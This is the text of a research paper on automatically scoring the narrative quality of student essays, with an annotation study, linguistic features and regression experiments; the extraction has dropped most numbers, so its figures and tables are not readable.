nguyen and litman, ; farra et al., ; somasundaran et al., ; beigman klebanov et al., ; shermis and burstein, ). similarly, operational essay scoring engines (attali and burstein, ; elliot, ) are geared towards evaluating language profi- ciency in general. in this work, we lay the ground- work and present the first results for automated scor- ing of narrative essays, focusing on narrative quality. one of the challenges in narrative quality anal- ysis is the scarcity of scored essays in this genre. we describe a detailed manual annotation study on scoring student essays along multiple dimensions of narrative quality, such as narrative development and narrative organization. using a scoring rubric adapted from the u.s. common core state stan- dards, we annotated essays written for differ- ent essay-prompts by students from three different grade levels. this data set provides a variety of story types and language proficiency levels. we measured inter-annotator agreement to understand reliability of scoring stories for traits (e.g., development) as well as sub-traits (e.g., plot development and the use of narrative techniques). a number of techniques for writing good stories are targeted by the scoring rubrics. we implemented a system for automatically scoring different traits of narratives, using linguistic features that capture some of those techniques. we investigated the effec- tiveness of each feature for scoring narrative traits and analyzed the results to identify sources of errors. the main contributions of this work are as fol- lows: ( ) to the best of our knowledge, this is the first detailed annotation study on scoring narra- tive essays for different aspects of narrative quality. transactions of the association for computational linguistics, vol. , pp. – , . action editor: alexander clark. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ( ) we present an automated system for scoring nar- rative quality, with linguistic features specific to en- coding aspects of good story-telling. this system outperforms a state-of-the-art essay-scoring system. ( ) we present analyses of trait and overall scoring of narrative essays, which provide insights into the aspects of narratives that are easy/difficult for hu- mans and machines to evaluate. related work . narrative assessments researchers have approached manual assessments of creative writing in a variety of ways. the “consensual assessment technique” (amabile, ; broekkamp et al., ) evaluates students’ creative writing on criteria such as creativity, originality and technical quality. consensus scoring is used, but the genre is considered to be too subjective for close agreement between scorers. story-telling in children has been studied and evaluated using a number of techniques. for ex- ample, the test of narrative language (gillam and pearson, ) is a standardized, picture-based, norm-referenced measure of narrative ability, used to identify language disabilities. stein and glenn ( ) used a story-schema approach to evaluate story recall in school children. miller and chapman ( ) adapted it to score story re-telling, mainly for clinical purposes. similarly, narrative re-telling is recorded and analyzed for length, syntax, cohesion, and story grammar in the strong narrative assess- ment procedure (strong et al., ). the index of narrative complexity (petersen et al., ) scores oral narratives on several dimensions and is used to study the effectiveness of clinical interventions. olinghouse and leaird ( ) used picture- prompts for eliciting narratives from about stu- dents at the nd and th grade levels. the stories were evaluated for organization, development and creative vocabulary, but the study focused on vocab- ulary characteristics at different grade levels. mck- eough et al. ( ) studied student narratives in order to compare talented and average writers. halpin and moore ( ) analyzed students’ re- telling of exemplar stories. they focused on event extraction, with the final goal of providing advice in an interactive story-telling environment. passonneau et al. ( ) annotated oral retellings of the same story on three consecutive days in order to study and model children’s comprehension. . narrative analysis in computational linguistics research on narratives in computational linguistics has employed fables, fairy tales, and literary texts, aiming at representing, understanding and extract- ing information, e.g., charniak ( ). goyal et al. ( ) analyzed aesop’s fables, producing auto- matic plot-unit representations (lehnert, ) with a task-specific knowledge base of affect. character traits and personas in stories have also been analyzed. for example, elsner ( ) pro- posed a rich representation of story-characters for the purpose of summarizing and representing nov- els. bamman et al. ( ) automatically inferred latent character types in english novels. valls- vargas et al. ( ) extracted characters and roles from russian folk tales, based on their actions. chaturvedi et al. ( ) analyzed short stories for characters’ desires and built a system to recognize desire fulfillment, using textual entailment. researchers have also studied social networks and have modeled relationships in stories (elson et al., ; celikyilmaz et al., ). agarwal et al. ( ) modeled character interactions from alice in wonderland for the purpose of social network anal- ysis. chaturvedi et al. ( ) modeled character relationships in novels, using structured prediction. wiebe ( ) proposed a method for tracking psychological points of view in narratives, looking at private states and subjective sentences. oves- dotter alm and sproat ( ) studied emotional se- quencing and trajectories in grimm’s fairy tales. ware et al. ( ) analyzed dimensions of conflict in four simple, constructed stories, with the goal of evaluating story content. similarly, swanson et al. ( ) analyzed blog narratives for narrative clause sub-types such as orientation, action and evaluation. reagan et al. ( ) used sentiment analysis to gen- erate emotional profiles for english novels. nlp methods have also been used for modeling and understanding narrative structures (finlayson, ; elson, ). see finlayson ( ) and mani ( ) for detailed literature surveys. one important aspect of a narrative is that it conveys a sequence of events (fludernik, ; almeida, ). chambers and jurafsky ( ; ) presented techniques for the automatic acqui- sition of event chains and event schemas (chambers, ), which are related to earlier notions of scripts as prepackaged chunks of knowledge (schank and abelson, ). this line of research has received a great deal of attention (nguyen et al., ; bal- asubramanian et al., ; jans et al., ; mcin- tyre and lapata, ). for narratives, ouyang and mckeown ( ) focused on automatic detection of compelling events. bogel et al. ( ) worked on extraction and temporal ordering of events in narra- tives. based on the ‘narrative cloze test’ (chambers and jurafsky, ), mostafazadeh et al. ( ) pre- sented a framework for evaluating story understand- ing algorithms, the ‘story cloze test’, whose goal is to predict a held-out continuation of a short story. our research differs significantly from previous work. we aim to evaluate, on an integer scale, the quality of narratives in student-generated essays. in- sights from previous work on narrative analysis can be useful for our purposes if they capture narrative techniques employed by student writers, and if they correlate with scores representing narrative quality. it is still an open question whether an elaborate rep- resentation and understanding of the story is needed for evaluating student writing, or whether encod- ing features that capture different narrative aspects might be sufficient. further, depending on the type of story, not all aspects of narrative analysis may come into play. for example, plot construction and narrative elements such as conflict may be central to creating a hypothetical story about an antique trunk, but not so much in a personal story about a travel experience. to the best of our knowledge, this work makes a first attempt at investigating the evaluation of narrative quality using automated methods. . automated essay scoring there are a number of automated essay scoring (aes) systems, many of which are used oper- ationally, such as e-raterr (attali and burstein, ), intellimetric (elliot, ), the intelligent es- say assessor (landauer et al., ) and project es- say grade (page, ). however, these previous studies have not been focused on narratives. in a somewhat related study to this one, somasun- daran et al. ( ) scored oral narratives that were generated by international students in response to a series of pictures. some of the features used in that study overlap with our work due to the overlap in the genre; however, their focus was on scoring the response for language proficiency. graph features, which we have used in this work, have been shown to be effective in capturing idea development in es- says (somasundaran et al., ). this work also employs graph features, but it is one of the many we explore for encoding the various linguistic phenom- ena that characterize good narratives. data our data comprises narrative essays written by school students in the criterion r© program , an on- line writing evaluation service from educational testing service. it is a web-based, instructor-led writing tool that helps students plan, write and revise their essays. narrative essays were obtained from grade levels , and . each essay was written in response to one of story-telling prompts related to personal experiences, hypothetical situations, or fictional stories. below are some example prompts: [personal experience] there are moments in everyone’s lives when they feel pride and accomplishment after completing a challenging task. write a story about your proudest moment. [hypothetical situation] pretend that one morning you wake up and find out that you’ve become your teacher for a day! what happened? what do you do? do you learn anything? write a story about what happens. use your imagination! [fictional story] throughout the years, many have placed mes- sages in sealed bottles and dropped the bottles into the ocean where they eventually washed up on foreign shores. occasion- ally the finder has even contacted the sender. write a story about finding your own message in a bottle. the average essay length in our data is words, with a range of to words and a standard devi- ation of . a sample essay, “message in a bottle”, in response to the fiction story prompt above is pre- sented below: last year, i went back to my hometown. there was a big beautiful beach on which i had often played as a child. nevertheless, when i went to the beach, it changed. i looked a great deal of trash, and https://criterion.ets.org/criterion many animal disappeared. without original breath- taking scene, there had been destroyed very well. all of a sudden, i watched a bottle when i walked on the beach. i opened the bottle with my cu- riosity. there was a message in the bottle. the mes- sage was “whoever you are, please help this beach. we need more clean beach to survive.” i was sur- prised that this message should be from the sea crea- ture. they need humans’ help, or they would die. therefore, i persuaded the other people who live there to clean the beach immediately. they all agreed to come and to help those animals. finally, with a lot of people’s help, the beach became beau- tiful as before. i thought that those who under the sea were very comfortable and happy to live a clean surroundings. scoring narrative essays our work focuses on automatically evaluating and scoring the proficiency of narrative construction in student essays. therefore, we use a rubric created by education experts and teachers, and presented by smarter bal- anced, an assessment aligned to u.s. state standards for grades k- . . trait scoring the scoring rubric provides guidelines for scor- ing essays along three traits (dimensions): pur- pose/organization (hereafter, referred to as organi- zation or org.), development/elaboration (develop- ment or dev.) and conventions (or conv.). each of the dimensions is described below. . . organization organization is concerned with the way a story is arranged in general. it focuses on event coherence, on whether the story has a coherent start and end- ing, and whether there is a plot to hold all the pieces of the story together. this dimension is judged on a scale of - integer score points, with being the highest score. the rubric provides the following cri- teria for an essay of score point in terms of five as- pects or sub-traits: “the organization of the narrative is fully sustained and the focus is clear and maintained throughout: . an effective plot; . effectively establishes https://portal.smarterbalanced.org/ library/en/performance-task-writing- rubric-narrative.pdf character/setting/pov; . consistent use of a variety of transitioning strategies; . natural, logical sequencing of events; . effective opening/closing.” an essay is judged non-scorable if it is insuffi- cient, written in a language other than english, off- topic, or off-purpose. such essays are assigned a score of in our scheme. . . development development focuses on how the story is devel- oped. it evaluates whether the story provides vivid descriptions, and whether there is character devel- opment. this dimension is also judged on a scale of - integer score points, with being the high- est score. as in the scoring of organization, in our scheme, non-scorable essays are assigned a score for development. the rubric provides the following criteria for an essay of score point in terms of five aspects or sub-traits: “the narra- tive provides thorough, effective elaboration using rele- vant details, dialogue, and/or description: . clearly de- veloped character/setting/events; . connections made to source materials; . effective use of a variety of narrative techniques; . effective use of sensory, con- crete, and figurative language; . effective, appropriate style.” . . conventions this dimension evaluates the language profi- ciency, judged on a scale of - integer score points, with being the highest score. according to the rubrics, the following characterizes an essay of score point : “the response demonstrates an adequate com- mand of conventions: adequate use of correct sentence formation, punctuation, capitalization, grammar usage, and spelling.” . sub-trait scoring as noted above, organization and development are each composed of sub-traits. we scored these sub- traits manually using the same -point scale as the main trait scores. this yields sub-trait scores in addition to the main trait scores, for a total of manually assigned scores per essay. we produced guidelines and selected a small set of benchmark es- says for training two scorers. . narrative and total scores based on the human-assigned trait scores, we de- rive narrative and total composite scores for each essay. the narrative score for each essay is cal- culated by summing the organization and develop- ment trait scores. this gives the essay a narrative score on an integer scale from to . we sum up the three trait scores (organization + development + conventions) to get a total score on an integer scale from to . even though narrative and total composites are not defined separately/independently from their components, they provide us with an esti- mate of how manual and automated scoring will per- form on these data for scenarios where, for example, a single overall score has to be assigned. annotation and data statistics two research assistants, both co-authors on the pa- per but not involved in system development, per- formed the scoring. both annotators are native speakers of english with more than four years of linguistic annotation experience. using the scor- ing rubric described above, the lead annotator cre- ated a guideline and benchmark dataset of es- says spanning all score points. this was used for training a second annotator and three researchers (all co-authors on the paper), and the resulting feedback was used to refine the guidelines. two rounds of training were conducted, with and essays re- spectively. a score discrepancy of more than one point for any of the traits triggered a discussion in order to bring the scores closer (that is, the scores should only differ by one point). exact agreement was not sought due to the very subjective nature of judging stories. one of the researchers served as ad- judicator for the discussions. no specific training was performed for the sub-traits; disagreements on sub-traits were discussed only within trait-level dis- cussions. once the training was completed, a total of essays were scored. of these, essays were singly scored and essays were double-scored to measure agreement. scoring of each essay thus in- volved assigning scores ( traits + sub-traits) and took approximately to minutes. table for data requests see https://www.ets.org/ research/contact/data_requests/. shows the distribution of scores across the score- points for the three traits. score org. dev. conv. - - table : score distributions for traits . inter-annotator agreement to calculate agreement, we use quadratic weighted kappa (qwk) (cohen, ), a well-established metric in assessment that takes into account agree- ment due to chance. it is equivalent to a form of intra-class correlation and, in most cases, is compa- rable to pearson’s r. the qwks calculated over doubly annotated essays are reported in table . the three main traits are shown in bold, the sub-traits are prefixed with a ”:”, and the composite traits (narra- tive and total) are shown in italics. trait:sub-trait qwk organization . :plot . :characters/setting/pov . :transitioning . :sequencing . :opening/closing . development . :characters/setting/events . :narrative techniques . :language . :source materials . :style . convention . narrative (org. + dev.) . total (org. + dev. + conv.) . table : inter-annotator agreement for the organization and development traits, which capture the narrative aspects of writing, the “message in a bottle” sample essay in section re- ceived scores of org.: , dev.: , and conv.: . the high score for conventions reflects the rubric’s requirement of adequate (but not stellar) command of language usage. scoring agreement is quite high: organization (qwk= . ) and development (qwk= . ). this result is promising as it indicates that organization and development of story-telling can be reliably scored by humans. surprisingly, the agreement for the non-narrative dimension, conventions, is only rather moderate (qwk= . ). discussion among the two annotators revealed that the criteria for the score points in conventions were very subjective. for example, they had difficulty deciding on when a conventions violation, such as a specific grammati- cal error, was severe, and how much variety among the error types was needed to move the conventions score from one score point to another. table shows that agreement for all sub-traits is lower than agreement for the corresponding trait. sub-trait agreement results also show that some story traits are more reliably scored than others. for example, it is easier to evaluate good openings and closings in stories (qwk= . ) than to evaluate the quality of story style (qwk= . ). evaluation of stylistic devices and whether they indeed enhance the story is rather subjective. agreement for the narrative and total scores is also quite good. narrative achieves a higher qwk than its individual components. the high agreement of the total scores is interesting, as it incorporates the conventions scores, on which substantial agree- ment was not achieved. . inter-trait correlations previous research on writing has shown that traits are usually correlated (lee et al., ; bacha, ; klein et al., ). we also observed this in our data. inter-trait correlations (pearson’s r) are shown in ta- ble . scores for organization and development, are highly correlated (r = . ), and each is also correlated with conventions (r = . and . , re- spectively), albeit not as strongly. not surprisingly, the composite scores, narrative and total, are highly correlated to their components. linguistic features we used the scoring rubric as a guideline for explor- ing construct-relevant features with a view towards automated analysis. we developed sets of features for the different narrative characteristics. each set is org. dev. conv. nar. tot. org. . . . . . dev. . . . . conv. . . . nar. . . total . table : score correlations for traits, narrative and total. described in detail in the following sections. . transition feature set effective organization of ideas and events is typi- cally achieved with the use of discourse markers. in order to encode effective transitioning, we com- piled a transition-cue lexicon, and constructed fea- tures based on it. we compiled a list of discourse cues from the penn discourse treebank (pdtb) manual (prasad et al., ), and we manually collected a list of tran- sition cues from the web by mining websites that provide tips on good essay/narrative writing. the latter, with a total of unigrams and multi-word expressions, is more focused on cues that are used commonly to write stories (e.g., cues that provide locational or temporal connections) than the former. using the lexicon, we extracted two features from each essay: the number of cues in the essay and that number divided by the essay length. these two fea- tures form the transition feature set. . event-oriented feature set events are the building blocks of narratives, and good story-telling involves skillfully stringing events together. we construct an event-based fea- ture set, events, to capture event cohesion and co- herence. following the methodology proposed by chambers and jurafsky ( ), we built a database of event pairs from the gigaword fifth edition cor- pus (parker et al., ). specifically, we used the annotated gigaword distribution (napoles et al., ), which has been automatically annotated with typed dependency information (de marneffe and manning, ). following chambers and ju- rafsky ( ), we define events as verbs in a text (excluding be/have/do) and pairs of events are de- fined as those verbs that share arguments in the text. in the present work we limit our scope to the fol- lowing set of (typed dependency) arguments: nsubj, dobj, nsubjpass, xsubj, csubj, csubjpass. to estimate event cohesion, we extract all event pairs from an essay after pre-processing it with the stanford core nlp toolkit (manning et al., ). event tokens from the essay are linked into pairs when they share a filler in their arguments. for essays, we use stanford co-reference resolution for matching fillers of verb-argument slots. for all event pairs extracted from an essay, we query the events database to retrieve the pair association value (we use the point-wise mutual information (church and hanks, )). we define three quantitative mea- sures to encode event cohesion: ( ) total count of event pairs in the essay; ( ) proportion of in-essay event-pairs that are actually found in the events database; ( ) proportion of in-essay event-pairs that have substantial association (we use pmi ≥ ). we also capture aspects of coherent event se- quencing. for this, we compute event chains, which are defined as sequences of events that share the same actor or object, in subject or direct object role (chambers and jurafsky, ). specifically, we en- code the following additional features in the events feature set: ( ) the length of the longest chain found in the essay (i.e., number of event pairs in the chain); ( ) the score of the longest chain (computed as the sum of pmi values for all links (event pairs) of the chain); ( ) the length of the second longest chain found in the essay; ( ) the score of the highest scor- ing chain in the essay; ( ) the score of the second highest scoring chain in the essay; ( ) the score of the lowest scoring chain is the essay; ( ) the sum of scores for all chains in the essay. for each of the features - , we also produce a feature that is normalized by the log of the essay length (log word- count). . subjectivity-based feature set evaluative and subjective language is used to de- scribe characters (e.g., foolish, smart), situations (e.g., grand, impoverished) and characters’ private states (e.g., thoughts, beliefs, happiness, sadness) (wiebe, ). these are evidenced when charac- ters are described and story-lines are developed. we use two lexicons for detecting sentiment and subjective words: the mpqa subjectivity lexicon (wilson et al., ) and a sentiment lexicon, as- sess, developed for essay scoring (beigman kle- banov et al., ). mpqa associates a posi- tive/negative/neutral polarity category to its entries, while assess assigns a positive/negative/neutral polarity probability to its entries. we consider a term from assess to be polar if the sum of positive and negative probabilities is greater than . (based on manual inspection of the lexicon). the neutral cat- egory in mpqa comprises subjective terms that in- dicate speech acts and private states (e.g., view, as- sess, believe), which is valuable for our purposes. the neutral category in assess consists of non- subjective words (e.g., woman, technologies), which we ignore. the polar entries of the two lexicons dif- fer too. assess provides polarity for words based on the emotions they evoke. for example, alive, awakened and birth are highly positive, while crash, bombings and cyclone are strongly negative. we construct a subjectivity feature set comprised of features encoding, for each essay, the presence (a binary feature) and the count of mpqa and as- sess polar words and mpqa neutral words. . detailing feature set providing specific details, such as names to char- acters, and describing the story elements, helps in developing the narrative and providing depth to the story. proper nouns, adjectives and adverbs come into play when a writer provides descriptions. thus, we create a details feature set comprised of a total of features encoding, separately, the presence (a binary feature) and the count of proper nouns, ad- jectives and adverbs. . graph feature set graph statistics have been reported to be effective for capturing development and coherence in essays (mesgar and strube, ; somasundaran et al., ). we closely follow the implementation and features described in somasundaran et al. ( ) for capturing narrative development (due to space constraints we refer the reader to the original paper). graphs were constructed from essays by represent- ing each content word (word type) in a sentence as a node in the graph. links were drawn between words belonging to adjacent sentences. features based on connectivity, shape and pagerank were extracted, giving a total of graph features. specifically, the features used were: percentage of nodes with de- grees one, two and three; the highest, second-highest and median degree in the graph; the highest degree divided by the total number of links; the top three pagerank values in the graph, their respective neg- ative logarithms, and their essay length-normalized versions; the median pagerank value in the graph, its negative log and essay length-normalized ver- sion. . content word usage content word usage, also known as lexical density (ure, ), refers to the amount of open-class (con- tent words) used in an essay. the greater proportion of content words in a text, the more difficult or ad- vanced it is (yu, ; o’loughlin, ), and it has been suggested that, for academic discourse, too much lexical density is detrimental to clarity (hal- liday and martin, ). the content feature is the inverse of the proportion of content words (pos tagged noun/verb/adjective/ adverb) to all words of an essay. . pronoun usage the use of pronouns in story-writing has several im- portant aspects. on one hand, pronouns can indi- cate the point of view (perspective) in which the story is written (fludernik, ; rimmon-kenan, ). perspective is important in both construction and comprehension of narrative (rimmon-kenan, ). the use of pronouns is also related to reader engagement (mentzell et al., ) and im- mersion (oatley, ). stories with first person pronouns lead to stronger reader immersion, while stories written in third person lead to stronger reader arousal (hartung et al., ). in our data, we counted personal pronouns (e.g., i, he, it), including contractions (e.g., he’s), and possessive pronouns (e.g., my, his). for each story, the counts were nor- malized by essay length. a single feature, pronoun, was encoded using the proportion of first and third person singular pronouns in the essay. . modal feature as an account of connected events, a narrative typ- ically uses the past tense. by contrast, modals ap- pear before untensed verbs and generally refer to the present or the future. they express the degree of ability (can, could), probability (shall, will, would, may, might), or obligation/necessity (should, must). an overabundance of modals in an essay might be an indication that it is not a narrative or is only marginally so. this idea is captured in the modal feature, which is the proportion of modals to all words of an essay. . stative verbs stative verbs are verbs that describe states, and are typically contrasted with dynamic verbs, which describe events (actions and activities) (vendler, ). in narrative texts, stative verbs are often used in descriptive passages (smith, ), but they do not contribute to the progression of events in a story (almeida, ; prince, ). our conjecture is that if a text contains too many stative verbs, then it may not have enough of an event sequence, which is a hallmark of a narrative. we compiled a list of english stative verbs (e.g., know, own, resemble, prefer) from various linguistic resources on the web. during processing of an essay, we identify verbs by pos tags, and stative verbs via list-lookup. sepa- rately, we identify copular uses of “to be” and count them as statives. our feature, statives, is the propor- tion of stative verbs out of all verbs in an essay. experiments our experiments investigate the following ques- tions: ( ) is it possible to score narrative quality traits in essays using automated methods? ( ) which of our feature sets are effective for scoring narrative quality traits? ( ) how do our narrative-inspired fea- tures perform as compared to a baseline that is com- petitive but does not specifically address the narra- tive construct? ( ) how does overall scoring of nar- rative essays differ from trait scoring? ( ) what are the best feature combinations for narrative scoring? to answer these questions, we built and evaluated scoring systems for each trait, overall narrative and total scores. in each case, we performed detailed ablation studies at the feature-set level. we have features sets ( feature sets described above plus a baseline feature set); thus feature set combi- nations were investigated. as our traits are highly correlated, we used all of our features for building systems for each trait, leaving it to the ablation pro- cess to reveal the most promising feature set combi- nation. . baseline e-rater (attali and burstein, ), a state-of-the- art commercial system for automatic essay scor- ing, uses a comprehensive suite of features cover- ing many aspects of writing quality, such as gram- mar, language use, mechanics, fluency, style, or- ganization, and development. we use all of the features from e-rater, a total of features, as the baseline feature set. while e-rater is not designed for trait scoring, it incorporates features that ad- dress the traits of interest in this work. develop- ment and organization are captured by features that, among other things, count and encode the num- ber and length of discourse elements such as the- sis, main points, supporting ideas, and conclusion (burstein et al., ). . results we experimented with linear regression, sup- port vector regression (rbf kernel), random forests, and elastic net learners from the scikit- learn toolkit (pedregosa et al., ), with -fold cross-validation on essays. as linear regres- sion results were consistently better, both for base- line and for our features, we only report results from this learner. trimming of the predicted lin- ear regression output was performed; that is, if the predicted score was above the max score, or be- low the min score, it was assigned the max or the min score, respectively. bootstrapping experiments (berg-kirkpatrick et al., ; efron and tibshirani, ) were performed to test for statistical signifi- cance (we used bootstrap samples). for each trait-scoring experiment, we extracted all the features (described in section ) from the es- says and used the corresponding human trait scores for training and testing. thus, the input essays and their features are the same across all experiments. what varies is the trait to be predicted and, conse- quently, the performance of feature sets as well as the best feature combination. table shows the performance of baseline, the individual features, all features, and the best fea- ture combination, for all three traits, overall nar- rative and total scoring. performance of individ- ual features that exhibit some predictive power is also shown in the table. the single-measure fea- tures modal, pronoun, content, and stative show no predictive power individually (qwks = ) and are omitted from the table for space reasons. organization understandably, baseline performs poorly for scoring organization in narratives, as its focus is evaluating overall writing proficiency. in- dividual feature sets, details, transition, events and subjectivity, have some predictive capability, but it is not very high. this is not surprising as they each encode only a specific aspect of narrative quality. the graph feature set outperforms the baseline fea- ture set, but the difference is not statistically signif- icant. when all features are put together (all fea- tures), the qwk obtained is . , which is substan- tially higher than baseline (p < . ), but as not as good as the best performing feature set. the best combination of our proposed features (details+ modal+ pronoun+ content+ graph+ sub- jectivity+ transition) achieves a qwk of . , sub- stantially better performance than baseline (p < . ), reflecting an improvement of percentage points. this result indicates that developing features to encode narrative quality is important for evaluat- ing organization in narrative essays. most of our explored feature sets, even those that do not individ- ually perform well, are part of the best system. two feature sets that are not present in the best feature combination are statives and events. the exclusion of the former is reasonable – stative verbs are re- lated to story development. the exclusion of events is surprising, as it intuitively encodes the coherence of events, impacting the organization of the essay. the best feature combination that includes events achieves a qwk of . . the baseline features are not part of the best system, confirming our intuition that features that specifically encode narrative qual- ity are needed for this narrative trait. from our ablation results, we inspected the top best-performing feature set combinations in order to determine which features consistently produce good systems. pronoun, content, graph and subjectivity were a part of all of the top systems, transition was in , details was in and modal was in feature sets. this suggests that singleton features such as feature set organization development conventions narrative total baseline . . . . . details . . . . . transition . . . . . events . . . . . subjectivity . . . . . graph . . . . . all features . . . . . best feature combination* . . . . . table : performance (qwk) on predicting traits and narrative and total scores; best feature combinations: *for organization: details+ modal+ pronoun+ content+ graph+ subjectivity+ transition; *for development: details+ modal+ content+ graph+ statives+ transition; *for conventions: baseline + details + graph; *for narrative: baseline+ details+ modal+ pronoun+ content+ graph+ statives+ subjectivity+ transition; *for total: details+ baseline+ modal+ content+ graph+ subjectivity+ transition pronoun and content are indeed useful, even though they cannot be used in isolation. development we observe similar trends seen with the organization trait – the baseline feature set does not capture development very effectively, and some individual feature sets have predictive power for this trait but perform poorly. graph outper- forms baseline, but this is not statistically signifi- cant. using all of the available features produces qwk= . , a significant improvement over base- line, (p < . ). the best system achieves a per- formance of qwk= . , outperforming baseline by percentage points (p < . ). the best feature combination contains of the proposed features and differs from the best features for organization by the inclusion of statives and the exclusion of pro- noun and subjectivity. content, graph and transi- tion also occur in all of the top best-performing systems. conventions even though scoring language con- ventions is not the focus of this work, we were cu- rious how well our features evaluate this dimension. we observe that overall performance is lower than for the other two traits, which is to be expected as we do not have high human inter-rater agreement to start with. the baseline e-rater feature set is the best performing individual feature set, and the narrative- specific features perform rather poorly. using all features (qwk= . ) only produces a point im- provement over baseline, which is not statistically significant. adding details and graph to baseline produces the best system, an improvement of per- centage points, qwk= . , (p < . ). all three features are also the only feature sets that consis- tently occur in all the top-performing systems. narrative in general, the results for narrative scoring follow the same trends as the results for or- ganization. graph features outperform the baseline significantly (p < . ). using all available features produces a significant improvement in performance ( . qwk; p < . ). baseline features are now a part of the best feature set combination (baseline+ details+ modal+ pronoun+ content+ graph+ sta- tives+ subjectivity+ transition), which achieves a qwk of . , an improvement of percentage points (p < . ). the best feature combination without the baseline features achieves qwk = . , and this is not statistically different from the per- formance of the best system. modal, content, and graph occur in all , and subjectivity and transi- tion occur in nine of the top feature combinations. total for total scoring, the baseline feature set is the best performing individual feature set, with qwk = . . using all features produces a signifi- cant (p < . ) performance boost at . qwk. the best feature combination (details+ baseline+ modal+ content+ graph+ subjectivity+ transition) improves over baseline by percentage points, with a qwk of . (p < . ). the best result obtained by a feature combination without baseline (details+ modal+ content+ graph+ subjectivity+ transition) is qwk = . , which is significantly higher than the baseline performance (p < . ), indicating that our features are able to effectively score essays by themselves, as well as in combina- tion with the baseline features to get an improved system. except for details and transition, all fea- tures of the best system also occur in all the top- systems. analysis and discussion the results show that our proposed features vary in effectiveness. graph features proved to be more effective than transition, subjectivity and details. the effectiveness of single-measure features (pro- noun, statives, content and modal) was evident by their inclusion in the best combination models. although events was reasonably predictive on its own for organization and development, it was not found in the best performing combinations, nor did it participate in the top feature sets for any of the traits. this surprising result suggests that other features, which are correlated with events, must be stronger indicators of narrative competence. our results also show no clear segregation of fea- tures by trait, as most of the features appearing in the best models for organization and development were the same. we attribute this to the high correla- tion between the human scores for the two traits; a model that is good for one will be good for the other. . correlation study we performed correlation analysis to test if our intu- itions regarding the feature sets, as discussed in sec- tion , are supported by the data, and to study the effect of length. length is a well-known confound- ing factor in essay scoring as longer essays tend to get higher scores (chodorow and burstein, ). this also applies to narratives, as it is difficult to tell a good story without using a sufficient amount of words. in our data, pearson correlations of essay length with human scores are: conv.: . , dev.: . , org.: . . however, it is important that our encoded features capture more than just the length of the narrative. in order to test this, we conducted cor- feat org dev conv base. . ( . ) . ( . ) . ( . ) detl. . ( . ) . ( . ) . ( . ) trans. - . ( . ) - . ( . ) - . ( . ) event . ( . ) . ( . ) . ( . ) subj. . ( . ) . ( . ) . ( . ) graph . ( . ) . ( . ) . ( . ) cont. - . (- . ) - . (- . ) - . (- . ) pron. . ( . ) . ( . ) . ( . ) modal - . (- . ) - . (- . ) - . (- . ) statv. - . (- . ) - . (- . ) - . (- . ) table : maximal partial correlations with scores, con- trolling for length (simple correlations in parentheses). relation analysis between each feature and human trait score by partialling out length. table shows the maximal partial correlation of each feature set with the human scores. for feature sets that contain only a single feature (e.g., modal), we directly report the partial correlation for that fea- ture. for feature sets that contain multiple features, due to space constraints, we report the maximal par- tial correlation achieved by any feature within that set . the value in the parentheses indicates the cor- responding feature’s simple correlation with score. we observe that for all features except pronoun and modal, the correlation with score drops when length is accounted for, indicating the influence of essay length on scores. this effect is more pro- nounced in features that employ counts (e.g., counts of adverbs), as more support is found in longer es- says. the baseline is correlated more with conven- tions than the two narrative traits. an opposite effect is seen for our narrative-specific features. the neg- ative sign for statives, content and modal supports our intuitions regarding these features – more use of these reduces story quality. . error analysis table shows the human-machine confusion matrix for development trait scores. confusion matrices for other traits also show a similar trend. we observe that most of the errors in score prediction are at adja- cent score points. this is perhaps in part due to our human-human agreement criterion during data an- note that, within a set, different features might have maxi- mum values for different traits human machine total table : human-machine confusion matrix for develop- ment traits scores notation – disagreement of one score point did not trigger adjudication. the system encounters more difficulty predicting the correct scores at the ends of the scale (score points - and score point ). the difficulty with scores and is partially attributable to the small amount of training data for these scores. in a more detailed analysis of the human-machine discrepancies, we first focus on the forty essays that were rated by the annotators (table , row ). the machine and human agreed on only eight of these. all eight are non-narratives, and seven of them are extremely short ( to words). twenty seven of the remaining were well-written, long, non-narrative essays (and thus off-purpose accord- ing to our rubric). for example, one of the essays, which was written for a “describe a travel experi- ence” prompt, presented a discussion about the edu- cational advantages of travel in general. next, we consider the essays (all narratives) that were rated by the annotators (row of table ). of these, the eight that were scored by the ma- chine were rather short (length to words) and poorly written. the human and the machine agreed on essays, whose average length was somewhat longer ( words). for the essays that the ma- chine over-scored by point, the average length was words. all five essays that the machine over- scored by points were long, ranging from to words, but were either expository essays or were very poorly written. this scoring pattern sug- gests that human-machine disagreement is at least partially rooted in essay length. for the essays that were rated by the human an- notators (table , last row), the machine underesti- mated nine essays by points. these essays were relatively short (from to words). for com- parison, in the essays where the machine under- estimated the human score by only one point, the average length was words. for the essays that were scored by both the human and machine, the average length was words. a similar effect of length was seen among the essays scored and by the human annotators. the error analysis at the lowest range of human scores demonstrates that an accurate system must be able to properly handle non-narrative essays. one possible solution is to consider coupling our sys- tem with a binary narrative classifier that would flag non-narrative essays. further research is also clearly needed to reduce the influence of essay length on automated scoring. this was particularly demon- strated for essays where writers managed to produce well written, but very short, stories that were under- scored by the machine. conclusions and future work in this article, we have presented evidence that hu- mans can reliably score development and organiza- tion traits and their sub-traits in narratives, and that some sub-traits can be more reliably scored than oth- ers. we have also presented evidence that automated systems with narrative-specific features can reliably score narrative quality traits and can do so signifi- cantly better than a state-of-the-art system designed to assess general writing proficiency. scoring narrative essays is challenging because typically there is no right answer, nor any limit to the creative possibilities in effective story-telling. in this work, we have explored only the proverbial tip of the iceberg in terms of features and methods for scoring narrative essays. while we are encouraged by our results, we believe that further improvement will re- quire more elaborate representations of story content and meaning. accordingly, we plan to explore au- tomated evaluation of narrative sub-traits, including plot, point of view and character development, and of the relationships among them. references caralee j. adams. . essay-grading software seen as time-saving tool. education week, ( ): – . apoorv agarwal, anup kotalwar, and owen rambow. . automatic extraction of social networks from literary text: a case study on alice in wonderland. in proceedings of the th international joint conference on natural language processing, pages – . michael j. almeida. . time in narratives. deixis in narrative: a cognitive science perspective, pages – . teresa m. amabile. . social psychology of creativ- ity: a consensual assessment technique. journal of personality and social psychology, ( ): – . yigal attali and jill burstein. . automated essay scoring with e-rater v. . . journal of technology, learning, and assessment, : . nahla bacha. . writing evaluation: what can an- alytic versus holistic essay scoring tell us? system, ( ): – . niranjan balasubramanian, stephen soderland, mausam, and oren etzioni. . generating coherent event schemas at scale. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , seattle, wa, october. david bamman, ted underwood, and noah a. smith. . a bayesian mixed effects model of literary character. in proceedings of the nd annual meet- ing of the association for computational linguistics, pages – 